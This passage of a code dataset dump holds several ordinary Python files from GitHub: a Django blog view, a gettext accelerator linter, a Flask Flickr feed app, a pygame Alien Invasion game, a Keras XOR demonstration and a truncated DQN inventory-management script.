redirect_url = reverse(\"blog:index\")\n return redirect(redirect_url)\n context = {\n \"form\": form,\n }\n return render(request, \"blog/edit_post.html\", context)\n\n\ndef delete_post(request, post_id=None):\n user = request.user\n if id:\n post = get_object_or_404(Post, pk=post_id)\n if post.author != request.user:\n return HttpResponseForbidden()\n else:\n post = get_object_or_404(Post, id=post_id)\n\n if request.POST:\n obj = post.delete()\n\n redirect_url = reverse(\"blog:index\")\n return redirect(redirect_url)\n context = {\n \"object\": post,\n }\n return render(request, \"blog/delete_post.html\", context)\n","repo_name":"danilonok/blogSiteDjango","sub_path":"mysite/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37481196944","text":"#!/usr/bin/env python3\n\n# Yes, this program *is* overkill.\n# However, it solves all of the following problems:\n# - If a translator accidentally messes up and assigns conflicting accelerators, then users don't have to suffer.\n# - If by random chance two accelerators share a letter, but don't appear together in any dialog, then don't complain.\n# - Nice error reporting if *anything* goes wrong. (Try doing that in /bin/sh!)\n\nfrom collections import defaultdict\nimport sys\nimport os\n\nCONFLICT_PAIRS = [\n ('_OK', '_Cancel'),\n ('_Accept', '_Cancel'),\n ('_Yes', '_No'),\n]\n\nMSGIDS = {e for pair in CONFLICT_PAIRS for e in pair}\n\n\ndef should_ignore_missing(_magic = []):\n envvar = os.environ.get('LINTACCEL_IGNORE_MISSING')\n if envvar is None:\n return False\n if envvar.lower() == 'n' or envvar == '0':\n return False\n if envvar.lower() == 'y' or envvar == '1' or envvar == '':\n return True\n if not _magic:\n print('[WARNING: ambiguous environment variable LINTACCEL_IGNORE_MISSING: \"{}\". Should be one of (unset), empty, \"0\", \"1\", \"y\", \"n\", \"Y\", or \"N\".]'.format(envvar))\n _magic.append(True)\n # Be on the safe side.\n return False\n\n\ndef read_pofile_values(pofile):\n last_msgid = None\n msgid_to_msgstr = dict()\n with open(pofile) as fp:\n for n, line in enumerate(fp.readlines()):\n line = line.rstrip()\n if line.startswith('msgid'):\n if last_msgid is not None:\n print('Duplicate msgid around line {}'.format(n))\n return None\n if not line.startswith('msgid \"') or not line.endswith('\"'):\n print('Weird msgid around line {}'.format(n))\n return None\n last_msgid = line[len('msgid \"'):-len('\"')]\n continue\n if not line.startswith('msgstr'):\n last_msgid = None\n continue\n if last_msgid in MSGIDS:\n if not line.startswith('msgstr \"') or not line.endswith('\"'):\n print('Weird msgstr around line {}'.format(n))\n return None\n msgstr = line[len('msgstr \"'):-len('\"')]\n if last_msgid in msgid_to_msgstr.keys():\n print('Redefinition of msgid {} around line {} (old: \"{}\", new: {})'.format(last_msgid, n, msgid_to_msgstr[last_msgid], msgstr))\n return None\n msgid_to_msgstr[last_msgid] = msgstr\n\n last_msgid = None\n\n return msgid_to_msgstr\n\n\ndef extract_accel(msgstr):\n parts = msgstr.split('_')\n if len(parts) != 2:\n print('msgstr \"{}\" should have exactly one underscore'.format(msgstr))\n return None\n if len(parts[1]) == 0:\n print('msgstr \"{}\" has one underscore, but no accelerator after it?!'.format(msgstr))\n return None\n return parts[1][0]\n\n\ndef check_pofile(pofile):\n msgid_to_msgstr = read_pofile_values(pofile)\n if msgid_to_msgstr is None:\n print('Could not read {}'.format(pofile))\n return 2\n\n missing_msgids = MSGIDS.difference(msgid_to_msgstr.keys())\n if missing_msgids:\n print('Missing translations for {}'.format(missing_msgids))\n if not should_ignore_missing():\n return 2\n else:\n print(' in PO-file {}'.format(pofile))\n\n return_code = 0\n msgid_to_accel = dict()\n for msgid, msgstr in msgid_to_msgstr.items():\n accel = extract_accel(msgstr)\n if accel is None:\n print(' for msgid {}'.format(msgid))\n accel = '_' + msgid # Anything unique to avoid clashes and crashes.\n return_code = 1\n else:\n # Ideally we want to know the same character-to-key mapping that the frontend uses.\n # However, that is not available, and probably impossible. `lower()` has to suffice.\n accel = accel.lower()\n msgid_to_accel[msgid] = accel\n\n for a, b in CONFLICT_PAIRS:\n if a in msgid_to_accel and b in msgid_to_accel and msgid_to_accel[a] == msgid_to_accel[b]:\n return_code = 1\n print('Conflicting accels: \"{}\" ({}) and \"{}\" ({}) both use the key \"{}\", and will appear in the same dialog.'.format(\n msgid_to_msgstr[a], a, msgid_to_msgstr[b], b, msgid_to_accel[b]))\n\n return return_code\n\n\ndef get_relative_path(filename):\n own_dirname = os.path.dirname(__file__)\n return os.path.join(own_dirname, filename)\n\n\ndef run():\n exitcode = 0\n with open(get_relative_path('LINGUAS')) as fp:\n for lang in fp.readlines():\n lang = lang.strip()\n pofile = get_relative_path(lang + '.po')\n if not os.path.exists(pofile):\n exitcode = max(2, exitcode)\n print('PO-file {} does not exist?!'.format(pofile))\n continue\n pofile_code = check_pofile(pofile)\n if pofile_code > 0:\n print(' in PO-file {}'.format(pofile))\n exitcode = max(pofile_code, exitcode)\n return exitcode\n\n\nif __name__ == '__main__':\n exit(run())\n","repo_name":"ars3niy/tdlib-purple","sub_path":"po/lint_accelerators.py","file_name":"lint_accelerators.py","file_ext":"py","file_size_in_byte":5131,"program_lang":"python","lang":"en","doc_type":"code","stars":142,"dataset":"github-code","pt":"48"} +{"seq_id":"30739335947","text":"#!/usr/bin/python3\n\"\"\"*dos*\nhello.py\n justamente es el script que toca escribir (ahí lo tienes escrito), luego de\n indicar en clase que ya teníamos un script en el repositorio que conseguía\n listar 'títulos' de fotos desde el fedd público de Flickr.\n Completa el proyecto. Lo que falta es presentar resultados.\n -- se está viendo se te ha servido la introducción que estamos llevando sobre\n python y el fw web flask\"\"\"\nfrom flask import Flask, render_template\nfrom lxml import etree\nfrom urllib.request import urlopen\napp = Flask(__name__)\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n@app.route('/person/')\ndef person(name):\n return render_template('person.html',a_name=name)\n\n@app.route('/titulosFotosSevilla')\ndef titFotos():\n titulosFotos = list()\n titulosFotos = findTitulos()\n return render_template('titFotos.html', titulos=titulosFotos)\n\n@app.route('/FotosSevilla')\ndef imagesFotos():\n imagesFotos = list()\n imagesFotos = findimages()\n return render_template('titFotos.html', arcompleto=imagesFotos)\n\n@app.route('/advices')\ndef advices():\n data = [\n 'Always finish what you started',\n 'Do what you\\'re doing your best',\n 'Do not cling to anything that will eventually destroy you'\n ]\n return render_template('advices.html', comments=data)\n\ndef findimages():\n ns={\"Atom\" : \"http://www.w3.org/2005/Atom\"}\n parser=etree.XMLParser()\n tree=etree.parse(urlopen('https://api.flickr.com/services/feeds/photos_public.gne?tags=sevilla'),parser)\n links = tree.xpath(\"//Atom:entry/Atom:link[@rel='enclosure']/@href\", namespaces=ns)\n arNodes = tree.xpath('//Atom:entry/Atom:title', namespaces=ns)\n images = list()\n arTitulos = list()\n arcompleto = (images,arTitulos)\n for link in links:\n images.append(link)\n print(link)\n for node in arNodes:\n arTitulos.append(node.text)\n print(node.text)\n return arcompleto\nif __name__ == '__main__':\n app.run(host='0.0.0.0',port=5003,debug=True)\n\n\n","repo_name":"algonzalvez/IAW","sub_path":"FliPyt.py","file_name":"FliPyt.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"8517894237","text":"import sys\n\nfrom time import sleep\n#this helps to pause the game for a moment when the ship is hit\n\nimport pygame\n\n\nfrom settings import Settings #to make instance of setting in the project and access setting\nfrom game_stats import GameStats\nfrom scoreboard import Scoreboard\nfrom button import Button\nfrom ship import Ship #to create a ship and call the ship's blitm() mathod \nfrom bullet import Bullet #\nfrom alien import Alien #\n\n\n\n\nclass AlienInvasition:\n #creat a class alieninvasition to manage game assets and behavior\n \n \n def __init__(self):\n #Initialize the game, and create game resources.\n \n pygame.init() #initialize the background setting\n \n \n self.settings = Settings() #creating instance of Setting \n self.screen = pygame.display.set_mode((0, 0), pygame.FULLSCREEN)\n self.settings.screen_width = self.screen.get_rect().width\n self.settings.screen_height = self.screen.get_rect().height\n '''When creating the screen surface, passing a size of (0, 0) \n and the parameter pygame.FULLSCREEN, this will figure out window size'''\n \n \n #self.screen = pygame.display.set_mode((1200, 800))\n \n \n # pygame.display.set_mode creates display window for the game\n # where games graphical element will be drawn\n self.screen = pygame.display.set_mode(\n (self.settings.screen_width, self.settings.screen_height))\n ## we create a screen and use width and height attributes of self.settings\n \n pygame.display.set_caption(\"Alien Invasion\")\n \n # Create an instance to store game statistics\n self.stats = GameStats(self)\n \n #Create an instance to store game statistics,\n #and create a scoreboard.\n self.sb = Scoreboard(self)\n \n self.ship = Ship(self)\n #self argument here is the instance of AlineInvasion and gives access to game's resources\n \n self.bullets = pygame.sprite.Group()\n self.aliens = pygame.sprite.Group() #creating instance for Alian\n \n self._create_fleet()\n \n ## Make the Play button\n self.play_button = Button(self, \"Play\")\n \n \n \n \n \n def run_game(self):\n \n #start the main loop for the page\n while True:\n self._check_events()\n \n if self.stats.game_active: #parts that should run only when the game is active\n self.ship.update() #ships position will be updated after checked for keyword events before update the screen\n self._update_bullets()\n self._update_aliens()\n \n self._update_screen() #updating the screen\n \n \n \n def _check_events(self): #simplyfying the run_game method\n \n #responding to keypresses and mouse events or whether player make any movements\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n sys.exit()\n \n #SHIP MOVEMENT / responding to key press \n elif event.type == pygame.KEYDOWN:\n self._check_keydown_events(event)\n \n elif event.type == pygame.KEYUP:\n self._check_keyup_events(event)\n \n elif event.type == pygame.MOUSEBUTTONDOWN:\n mouse_pos = pygame.mouse.get_pos()\n self._check_play_button(mouse_pos)\n \n \n \n def _check_play_button(self, mouse_pos):\n #Start a new game when the player clicks Play.\n \n button_clicked = self.play_button.rect.collidepoint(mouse_pos)\n if button_clicked and not self.stats.game_active:\n ###if self.play_button.rect.collidepoint(mouse_pos):\n \n \n self.settings.initialize_dynamic_settings()\n # Reset the game statistics.\n self.stats.reset_stats()\n self.stats.game_active = True\n self.sb.prep_score() # after resetting the game stats when starting a new game and start from 0\n self.sb.prep_level()\n self.sb.prep_ships()\n\n \n \n # Get rid of any remaining aliens and bullets.\n self.aliens.empty()\n self.bullets.empty()\n \n # Create a new fleet and center the ship.\n self._create_fleet()\n self.ship.center_ship()\n \n ## Hide the mouse cursor.\n pygame.mouse.set_visible(False)\n \n \n \n def _check_keydown_events(self, event):\n #respond to keypress\n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = True #set moving_right to true\n #If a KEYDOWN event occurs for the K_RIGHT key, we set moving_right to True.\n \n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = True\n #If a KEYDOWN event occurs for the K_LEFT key, we set moving_left to True.\n \n elif event.key == pygame.K_q: #press q to quit the game\n sys.exit()\n \n elif event.key == pygame.K_SPACE: #call bullet when spacebar is pressed\n self._fire_bullet()\n \n \n \n \n \n def _check_keyup_events(self, event):\n #respond to key releases \n if event.key == pygame.K_RIGHT:\n self.ship.moving_right = False #moving right to false\n #If a KEYUP event occurs for the K_RIGHT key, we set moving_right to false. \n \n elif event.key == pygame.K_LEFT:\n self.ship.moving_left = False\n #If a KEYUP event occurs for the K_LEFT key, we set moving_left to False.\n \n #if the right arrow key pressed, move the ship to the right\n #self.ship.rect.x += 1\n \n \n \n def _fire_bullet(self):\n #Create a new bullet and add it to the bullets group.\n \n if len(self.bullets) < self.settings.bullets_allowed:\n new_bullet = Bullet(self)\n self.bullets.add(new_bullet)\n \n \n \n \n \n def _update_bullets(self):\n #Update position of bullets and get rid of old bullets.\n # Update bullet positions.\n self.bullets.update() #it will automatically calls update() for each sprite in the group.\n \n #get rid of bullets that have disappeared\n for bullet in self.bullets.copy(): # it enables to modify bullets inside the loop.\n if bullet.rect.bottom <= 0:\n self.bullets.remove(bullet)\n \n #print(len(self.bullets))\n \n self._check_bullet_alien_collisions()\n \n \n \n \n def _check_bullet_alien_collisions(self):\n #\"Respond to bullet-alien collisions.\n # Remove any bullets and aliens that have collided.\n\n \n # Check for any bullets that have hit aliens.\n # If so, get rid of the bullet and the alien.\n collisions = pygame.sprite.groupcollide(self.bullets, self.aliens, True, True)\n \n if collisions:\n for aliens in collisions.values():\n self.stats.score += self.settings.alien_points * len(aliens) #making sure to score all hits\n #self.stats.score += self.settings.alien_points\n self.sb.prep_score()\n self.sb.check_high_score()\n \n if not self.aliens: #check whether the aliens group is empty\n # Destroy existing bullets and create new fleet.\n self.bullets.empty()\n self._create_fleet()\n \n #increase the game’s tempo by calling increase_speed() \n self.settings.increase_speed()\n \n # Increase level.\n self.stats.level += 1\n self.sb.prep_level()\n \n \n \n\n \n def _update_aliens(self):\n \n #Check if the fleet is at an edge, then update the positions of all aliens in the fleet.\n self._check_fleet_edges()\n #Update the positions of all aliens in the fleet and it calls ecah aline's update method\n self.aliens.update()\n \n # Look for alien-ship collisions.\n if pygame.sprite.spritecollideany(self.ship, self.aliens):\n #If no collisions occur, spritecollideany() returns None and the if block \n #will not execute\n self._ship_hit() #print function replaced\n #print(\"Ship hit!!!\")\n #if collided with the ship, it will execute ship \n \n # Look for aliens hitting the bottom of the screen.\n self._check_aliens_bottom() \n \n \n \n \n \n \n def _create_fleet(self):\n #Create the fleet of aliens. or \n \n #make an alien\n alien = Alien(self) #creat an alien\n #self.aliens.add(alien)\n \n \n # create an alien and find the number of aliens in a row.\n # spacing between each alien is equal to one alien weidth\n alien_width, alien_height = alien.rect.size\n # get the alien’s width & height from its rect attribute \n \n available_space_x = self.settings.screen_width - (2 * alien_width)\n # calculate the horizontal space available for aliens \n \n number_aliens_x = available_space_x // (2 * alien_width)\n #calculate the number of aliens that can fit into that space.\n \n \n # Determine the number of rows of aliens that fit on the screen.\n ship_height = self.ship.rect.height\n available_space_y = (self.settings.screen_height - (3 * alien_height) - ship_height)\n \n \n number_rows = available_space_y // (2 * alien_height)\n \n # Create the full fleet of aliens.\n for row_number in range(number_rows):\n #To create multiple rows, we use two nested loops\n #inner loop creates the alian in one row and outer loop count from zero\n \n # Create the first row of aliens.\n # set up a loop that counts from 0 to the number of aliens we need to make\n for alien_number in range(number_aliens_x):\n self._create_alien(alien_number, row_number)\n \n \n \n \n \n #this defines the alien number that’s currently being created. \n def _create_alien(self, alien_number, row_number):\n #Create an alien and place it in the row.\n \n # Create an alien and place it in the row.\n alien = Alien(self)\n alien_width, alien_height = alien.rect.size \n alien.x = alien_width + 2 * alien_width * alien_number\n alien.rect.x = alien.x\n alien.rect.y = alien.rect.height + 2 * alien.rect.height * row_number\n self.aliens.add(alien)\n \n\n \n \n \n \n def _check_fleet_edges(self):\n #Respond appropriately if any aliens have reached an edge.\n for alien in self.aliens.sprites():\n if alien.check_edges():\n self._change_fleet_direction()\n break\n \n \n \n \n def _change_fleet_direction(self):\n #Drop the entire fleet and change the fleet's direction.\n for alien in self.aliens.sprites():\n alien.rect.y += self.settings.fleet_drop_speed\n self.settings.fleet_direction *= -1 \n \n \n \n \n \n \n def _ship_hit(self):\n # _ship_hit() coordinates the response when an alien hits a ship\n #Respond to the ship being hit by an alien\n \n if self.stats.ships_left > 0:\n # Decrement ships_left, and update scoreboard. \n self.stats.ships_left -= 1\n #the number of ships left is reduced by 1\n self.sb.prep_ships()\n \n # Get rid of any remaining aliens and bullets after hit or reduced by 1\n self.aliens.empty()\n self.bullets.empty()\n \n # Create a new fleet and center the ship\n self._create_fleet()\n self.ship.center_ship()\n \n # Pause\n sleep(0.5)\n \n else:\n self.stats.game_active = False\n pygame.mouse.set_visible(True)\n \n \n \n \n \n def _check_aliens_bottom(self):\n #Check if any aliens have reached the bottom of the screen\n screen_rect = self.screen.get_rect()\n for alien in self.aliens.sprites():\n if alien.rect.bottom >= screen_rect.bottom:\n ## Treat this the same as if the ship got hit.\n self._ship_hit()\n break\n\n \n def _update_screen(self):\n #update image on the screen, and flip to the new screen \n \n self.screen.fill(self.settings.bg_color) \n #self.settings to access background color when filling the screen \n \n self.ship.blitme()\n #calling ship.blitme() to appear the ship on top of the background\n \n \n for bullet in self.bullets.sprites():\n bullet.draw_bullet()\n self.aliens.draw(self.screen) \n #To make the alien appear, we need to call the group’s draw() method \n \n # Draw the score information.\n self.sb.show_score()\n \n \n # Draw the play button if the game is inactive.\n if not self.stats.game_active:\n self.play_button.draw_button()\n \n #make the most recently drawn screen visible \n pygame.display.flip()\n \nif __name__ == '__main__':\n ai = AlienInvasition()\n ai.run_game()\n ","repo_name":"HBP1993/Pygame","sub_path":"alien_invasion.py","file_name":"alien_invasion.py","file_ext":"py","file_size_in_byte":13719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2052347354","text":"def average(array):\r\n array = set(array)\r\n length = len(array)\r\n avg = sum(array)/length\r\n return round(avg,3)\r\n\r\n#ESTA PARTE COMENTADA ESTABA BIEN PERO ME PUSIERON EN EL IF NAME LO QUE QUERIAN DE INPUT\r\n# quantity = input(\"\")\r\n# values = []\r\n# numbers = input('')\r\n# for num in [int(n) for n in numbers.split(\" \")]:\r\n# values.append(num)\r\n# array = set(values)\r\n# length = len(array)\r\n\r\n\r\n# def run():\r\n# average(array) \r\n\r\nif __name__ == \"__main__\":\r\n n= int(input())\r\n arr = list(map(int, input().split()))\r\n result = average(arr)\r\n print(result)","repo_name":"Fabriciogg8/python_basics","sub_path":"hackerrank10.py","file_name":"hackerrank10.py","file_ext":"py","file_size_in_byte":584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17925381062","text":"import os\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom tensorflow.keras.layers import Dense\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.optimizers import Adam\n\nos.environ[\"TF_CPP_MIN_LOG_LEVEL\"] = \"3\" # or any {'0', '1', '2'}\n\nnp.random.seed(1)\n\nX_xor = np.array([[1, 1], [1, 0], [0, 1], [0, 0]])\ny_xor = np.array([0, 1, 1, 0]) # 异或数据集\n\nX, y, m = X_xor, y_xor, 255\ncov = [[0.01, 0], [0, 0.01]] # 高斯分布的协方差矩阵\n\n# 以异或的4个点为中心 从2维高斯分布中各随机采样255个样本\nfor (xx, yy) in zip(X_xor, y_xor):\n x1, x2 = np.random.multivariate_normal(xx, cov, m).T\n X = np.r_[X, np.column_stack((x1, x2))]\n y = np.hstack((y, np.ones(m) * yy))\n\n\nfigure = plt.figure(figsize=(16, 8))\n\nwith plt.style.context('Solarize_Light2'):\n\n x_min, x_max = -0.5, 1.5\n y_min, y_max = -0.5, 1.5\n inc = 0.01\n xx, yy = np.meshgrid(np.arange(x_min, x_max, inc), np.arange(y_min, y_max, inc))\n i = 0\n h_array = [2, 3, 4, 5]\n col = len(h_array)\n\n for h in h_array:\n\n model = Sequential()\n model.add(Dense(units=h, activation=\"sigmoid\", input_shape=(2, )))\n model.add(Dense(units=1, activation='sigmoid'))\n model.summary()\n\n model.compile(\n optimizer=Adam(0.1),\n loss=\"binary_crossentropy\",\n metrics=['accuracy']\n )\n\n model.fit(X, y, epochs=10, batch_size=32)\n loss, acc = model.evaluate(X, y, verbose=2)\n\n Z = model.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z[:, 0].reshape(xx.shape)\n\n i += 1\n ax = plt.subplot(2, col, i)\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xticks(())\n ax.set_yticks(())\n\n ax.contourf(xx, yy, Z, alpha=.8)\n # contours = ax.contour(xx, yy, Z, np.arange(-0.1, 1.1, 0.1), alpha=.8)\n # ax.clabel(contours)\n\n ax.scatter(X[:, 0], X[:, 1], s=40, c=y, edgecolors='#002b36')\n # ax.text((xx.min()+xx.max())/2, yy.min()+0.05, (r'$%d$ neurons, acc = %.2f' % (h, acc)).lstrip('0'), size=14, color='#002b36', horizontalalignment='center')\n ax.set_title(r'$%d$ neurons, acc = %.2f' % (h, acc), color='#586e75', size=14)\n\n ax = plt.subplot(2, col, i+col, projection='3d')\n\n ax.plot_surface(xx, yy, Z)\n ax.set_xticks(np.arange(x_min, x_max+0.1, 0.5))\n ax.set_yticks(np.arange(y_min, y_max+0.1, 0.5))\n ax.set_xlabel(r'$x_1$')\n ax.set_ylabel(r'$x_2$')\n\nplt.subplots_adjust(wspace=0.08, hspace=0.08)\nplt.show()\n","repo_name":"Avanti1980/course-ml","sub_path":"python/dnn-xor.py","file_name":"dnn-xor.py","file_ext":"py","file_size_in_byte":2612,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"5354680275","text":"import random\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport pandas as pd\r\nfrom network_utils import MLP, LSTM\r\nimport argparse\r\nfrom rlib.algorithms.dqn import DQNAgent\r\nfrom rlib.environments.gym import GymEnvironment\r\nimport gym\r\nimport os\r\nfrom rlib.shared.utils import Logger\r\nimport gym_example\r\n\r\n\r\ndef get_args_parser():\r\n parser = argparse.ArgumentParser('Set transformer detector', add_help=False)\r\n\r\n parser.add_argument('--experiment_name', default='dqn_date_demo', type=str)\r\n parser.add_argument('--num_episodes', default=5000, type=int)\r\n parser.add_argument('--seed', default=5214, type=int)\r\n parser.add_argument('--output_dir', default='output', help='path where to save, empty for no saving')\r\n parser.add_argument('--env', default='stockManager-v2', type=str, choices=('stockManager-v0', 'stockManager-v1', 'stockManager-v2'))\r\n # Training\r\n parser.add_argument('--gamma', default=0.99, type=float)\r\n parser.add_argument('--target_update', default=1000, type=int)\r\n parser.add_argument('--learning_rate', default=2.5e-4, type=float)\r\n parser.add_argument('--train', default=False, type=bool)\r\n parser.add_argument('--test', default=False, type=bool)\r\n parser.add_argument('--sinusoidal_demand', default=False, type=bool)\r\n parser.add_argument('--sine_type', default=3, type=int)\r\n parser.add_argument('--resume', default=False, type=bool)\r\n parser.add_argument('--demand_satisfaction', default=False, type=bool)\r\n parser.add_argument('--past_demand', default=3, type=int)\r\n parser.add_argument('--noisy_demand', default=False, type=bool)\r\n parser.add_argument(\"--hidden_layers\", nargs=\"*\", type=int, default=[256, 128])\r\n parser.add_argument('--demand_embedding', default=3, type=int)\r\n parser.add_argument('--hidden_dim_lstm', default=128, type=int)\r\n parser.add_argument('--learn_every', default=4, type=int)\r\n parser.add_argument('--batch_size', default=32, type=int)\r\n parser.add_argument('--buffer_size', default=int(1e7), type=int)\r\n parser.add_argument('--tau', default=1e-3, type=float)\r\n parser.add_argument('--opt_soft_update', default=False, type=bool)\r\n parser.add_argument('--opt_ddqn', default=False, type=bool)\r\n parser.add_argument(\"--cuda_visible_device\", nargs=\"*\", type=int, default=None,\r\n help=\"list of cuda visible devices\")\r\n parser.add_argument('--inventory_weight', default=1, type=int)\r\n parser.add_argument('--stock_out_weight', default=1, type=int)\r\n parser.add_argument('--hack_test', default=False, type=bool)\r\n parser.add_argument('--hack_train', default=False, type=bool)\r\n parser.add_argument('--evaluate_train', default=False, type=bool)\r\n parser.add_argument('--material_name', default='Q115', type=str, choices= ['B120BP', 'B120', 'Q120', 'TA2J6500', 'Q115', 'Q2100H', 'Q3015'])\r\n\r\n return parser\r\n\r\n\r\nclass PolicyNetwork(nn.Module):\r\n def __init__(self, n_materials=1, past_stock=5, n_actions=2,\r\n hidden_dim_lstm=128, hidden_layers_mlp=[64, 32, 16], demand_embedding=3,\r\n device='cpu'):\r\n super(PolicyNetwork, self).__init__()\r\n self.n_materials = n_materials\r\n self.past_stock = past_stock\r\n self.device = device # torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\n self.lstm_demand = LSTM(n_materials, hidden_dim_lstm, demand_embedding, 2, True).to(self.device)\r\n self.lstm_stock = LSTM(n_materials, hidden_dim_lstm, demand_embedding, 2, True).to(self.device)\r\n self.mlp = MLP(2*demand_embedding + 3, n_actions, hidden_layers_mlp,\r\n activation=\"leakyRelu\", batch_norm=False).to(self.device)\r\n\r\n def forward(self, state):\r\n seq_stock, seq_demand = state[:, :, :self.past_stock], state[:, :, self.past_stock+1:]\r\n static_stock, static_demand, static_date = state[:, :, self.past_stock-1], state[:, :, -1], state[:, :, self.past_stock]\r\n encoder_stock = self.lstm_stock(seq_stock.reshape(seq_stock.shape[0], -1, self.n_materials))\r\n encoder_demand = self.lstm_demand(seq_demand.reshape(seq_demand.shape[0], -1, self.n_materials))\r\n hidden_features = torch.cat((encoder_stock, encoder_demand, static_stock, static_demand, static_date), dim=1)\r\n x = self.mlp(hidden_features)\r\n return x\r\n\r\nclass CustomGymEnvironment(GymEnvironment):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def start_env(self) -> None:\r\n \"\"\"Override Helper to start an environment.\"\"\"\r\n # self.env = gym.make(self._env_name, **kwargs)\r\n self.env.seed(self.seed)\r\n\r\n\r\nclass CustomDQNAgent(DQNAgent):\r\n def __init__(self, **kwargs):\r\n super().__init__(**kwargs)\r\n\r\n def save_state_dicts(self):\r\n \"\"\"Override Save state dicts to file.\"\"\"\r\n if not self.model_output_dir:\r\n return\r\n\r\n for sd in self.state_dicts:\r\n torch.save(\r\n sd[0].state_dict(),\r\n os.path.join(self.model_output_dir, \"{}.pth\".format(sd[1]))\r\n )\r\n\r\n def load_state_dicts(self):\r\n \"\"\"Override Load state dicts from file.\"\"\"\r\n if not self.model_output_dir:\r\n raise Exception(\"You must provide an input directory to load state dict.\")\r\n\r\n for sd in self.state_dicts:\r\n sd[0].load_state_dict(\r\n torch.load(os.path.join(self.model_output_dir, \"{}.pth\".format(sd[1])))\r\n )\r\n\r\n\r\nif __name__ == '__main__':\r\n parser = argparse.ArgumentParser('DETR training and evaluation script',\r\n parents=[get_args_parser()])\r\n args = parser.parse_args()\r\n print(args)\r\n if args.cuda_visible_device is not None:\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = ','.join(map(str, args.cuda_visible_device))\r\n\r\n output_dir = output_dir_logger = args.output_dir + '/' + args.experiment_name\r\n if args.test and not args.train:\r\n name = '_hack_test' if args.hack_test else '_test'\r\n if args.evaluate_train:\r\n name = name + '_evaluate_train'\r\n output_dir_logger = output_dir_logger+name\r\n os.makedirs(args.output_dir, exist_ok=True)\r\n\r\n np.random.seed(args.seed)\r\n random.seed(args.seed)\r\n\r\n mat_info = pd.read_csv(\"Data/Material_Information.csv\", sep=\";\", index_col=\"Material\")\r\n mat_info = mat_info.loc[[args.material_name]]\r\n hist_data = pd.read_csv(\"Data/Preprocessing/train.csv\")\r\n hist_data = hist_data[[args.material_name]]\r\n\r\n logger = Logger(path=output_dir_logger, comment=None, verbosity='DEBUG',\r\n experiment_name=args.experiment_name)\r\n\r\n config = {'hist_data': hist_data,\r\n 'mat_info': mat_info,\r\n 'random_reset': False,\r\n 'sinusoidal_demand': args.sinusoidal_demand,\r\n 'demand_satisfaction': args.demand_satisfaction,\r\n 'past_demand': args.past_demand,\r\n 'sine_type': args.sine_type,\r\n 'noisy_demand': args.noisy_demand,\r\n 'logger': logger,\r\n 'inventory_weight': args.inventory_weight,\r\n 'stock_out_weight': args.stock_out_weight,\r\n 'hack_train': args.hack_train,\r\n 'past_stock': args.past_demand,\r\n 'start_date_string': '2015-01-05'\r\n }\r\n if args.env == 'stockManager-v0':\r\n config.pop('inventory_weight', None)\r\n config.pop('stock_out_weight', None)\r\n config.pop('hack_train', None)\r\n env = gym.make(args.env, **config)\r\n\r\n test_data = pd.read_csv(\"Data/Preprocessing/test.csv\")\r\n test_data = test_data[[args.material_name]]\r\n test_config = {'hist_data': hist_data if args.evaluate_train else test_data,\r\n 'mat_info': mat_info,\r\n 'random_reset': False,\r\n 'sinusoidal_demand': args.sinusoidal_demand,\r\n 'demand_satisfaction': args.demand_satisfaction,\r\n 'past_demand': args.past_demand,\r\n 'sine_type': args.sine_type,\r\n 'noisy_demand': args.noisy_demand,\r\n 'test': True,\r\n 'logger': logger,\r\n 'hack_test': args.hack_test,\r\n 'past_stock': args.past_demand,\r\n 'start_date_string': '2019-11-04'\r\n }\r\n if args.env == 'stockManager-v0':\r\n test_config.pop('hack_test', None)\r\n test_env = gym.make(args.env, **test_config)\r\n\r\n # if gpu is to be used\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n print(f'device:{device}')\r\n # Get number of actions from gym action space\r\n # n_actions = env.action_space.n\r\n\r\n n_materials = 1\r\n\r\n policy_net = PolicyNetwork(n_materials=n_materials,\r\n past_stock=args.past_demand,\r\n n_actions=2,\r\n hidden_dim_lstm=args.hidden_dim_lstm,\r\n hidden_layers_mlp=args.hidden_layers,\r\n demand_embedding=args.demand_embedding,\r\n device=device)\r\n\r\n target_net = PolicyNetwork(n_materials=n_materials,\r\n past_stock=args.past_demand,\r\n n_actions=2,\r\n hidden_dim_lstm=args.hidden_dim_lstm,\r\n hidden_layers_mlp=args.hidden_layers,\r\n demand_embedding=args.demand_embedding,\r\n device=device)\r\n\r\n target_net.load_state_dict(policy_net.state_dict())\r\n\r\n new_hyperparameters = {\r\n \"buffer_size\": args.buffer_size,\r\n \"batch_size\": args.batch_size,\r\n \"gamma\": args.gamma,\r\n \"learning_rate\": args.learning_rate,\r\n \"tau\": args.tau,\r\n \"learn_every\": args.learn_every,\r\n \"hard_update_every\": args.target_update,\r\n 'opt_soft_update': args.opt_soft_update,\r\n 'opt_ddqn': args.opt_ddqn\r\n }\r\n\r\n dqn = CustomDQNAgent(\r\n state_size=args.past_demand + 3,\r\n action_size=2,\r\n qnetwork_local=policy_net,\r\n qnetwork_target=target_net,\r\n optimizer=None,\r\n new_hyperparameters=new_hyperparameters,\r\n seed=args.seed,\r\n device=device,\r\n model_output_dir=output_dir,\r\n opt_soft_update=False,\r\n opt_ddqn=False)\r\n\r\n if args.resume:\r\n 